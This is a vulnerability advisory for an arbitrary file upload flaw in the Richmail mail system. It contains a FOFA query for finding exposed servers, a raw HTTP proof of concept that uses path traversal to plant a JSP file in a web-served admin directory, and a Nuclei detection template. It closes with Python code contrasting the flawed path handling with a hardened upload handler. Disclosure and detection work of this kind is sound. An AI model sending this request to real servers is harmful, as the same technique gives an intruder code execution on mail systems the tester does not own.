Disclaimer
Do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses arising from spreading or using the information or tools provided here are the sole responsibility of the user; the author bears no responsibility for any adverse outcomes. This article is for educational purposes only.
Vulnerability description:
The openapiservice component of the Richmail mail system contains an arbitrary file upload vulnerability. An attacker can use it to upload arbitrary files, which may further lead to remote code execution.
Affected versions:
Richmail mail system
FOFA:
"Richmail 企业邮箱"
PoC:
POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="imageX"

0
------WebKitFormBoundary
Content-Disposition: form-data; name="imageY"

0
------WebKitFormBoundary
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundary
Content-Disposition: form-data; name="filename"; filename="../../../../../web/webmailsvr/admin/12.jsp"
Content-Type: text/plain

<% out.println("Vulnerable!"); %>
------WebKitFormBoundary--

Request the path of the uploaded file; if the response contains Vulnerable!, the target is vulnerable.
Nuclei template:
id: letter-image-upload-rce

info:
  name: Letter Image Upload RCE
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template checks for a vulnerability in the letterImageUpload functionality which allows arbitrary file upload leading to remote code execution.
  tags: rce,file-upload

http:
  - raw:
      - |
        POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

        ------WebKitFormBoundary
        Content-Disposition: form-data; name="imageX"

        0
        ------WebKitFormBoundary
        Content-Disposition: form-data; name="imageY"

        0
        ------WebKitFormBoundary
        Content-Disposition: form-data; name="submit"

        提交
        ------WebKitFormBoundary
        Content-Disposition: form-data; name="filename"; filename="../../../../../web/webmailsvr/admin/12.jsp"
        Content-Type: text/plain

        <% out.println("Vulnerable!"); %>
        ------WebKitFormBoundary--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "Vulnerable!"
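
The root cause the description points at is a client-supplied filename from the multipart request being used to build the write path, so "../" segments walk out of the upload directory and a .jsp lands where the container will execute it. The Python below is an added illustration, not Richmail's code (the real handler is Java); the upload root, the image extension allow-list and the magic-byte table are assumptions for the example. It places the flawed path join next to a hardened handler that strips directories, allow-lists image extensions, checks the content bytes and confirms the resolved path stays inside the upload root.

```python
import posixpath
import re

# Constructed upload root for the example; the real Richmail layout is unknown.
UPLOAD_ROOT = "/srv/webmail/upload/letterimages"
# A "letter image" upload should only ever produce image files.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Conservative name: letters, digits, '_' or '-', exactly one dot, short extension.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")


def vulnerable_target_path(filename: str) -> str:
    """The flawed pattern: the client-supplied name is joined to the upload
    root as-is. With the PoC filename the result leaves UPLOAD_ROOT and ends
    up at /web/webmailsvr/admin/12.jsp, a web-served directory."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, filename))


def safe_target_path(filename: str, head: bytes) -> tuple:
    """Hardened handler. Returns (True, path) or (False, reason).
    `head` is the first bytes of the uploaded content."""
    # 1. Drop any client-supplied directory part (either separator).
    base = posixpath.basename(filename.replace("\\", "/"))
    # 2. Allow only the conservative character set defined above.
    if not NAME_RE.fullmatch(base):
        return False, "filename has unexpected characters"
    ext = posixpath.splitext(base)[1].lower()
    # 3. Extension allow-list: .jsp, .jspx, .war and friends never pass.
    if ext not in MAGIC:
        return False, f"extension {ext} not allowed"
    # 4. The content must look like the image type it claims to be.
    if not any(head.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match extension"
    # 5. Belt and braces: the resolved path must still be under UPLOAD_ROOT.
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, base))
    if posixpath.commonpath([UPLOAD_ROOT, target]) != UPLOAD_ROOT:
        return False, "path escapes upload root"
    return True, target
```

Step 5 is redundant once step 1 has stripped the directory, but keeping it means a later change to the name handling cannot silently reopen the traversal.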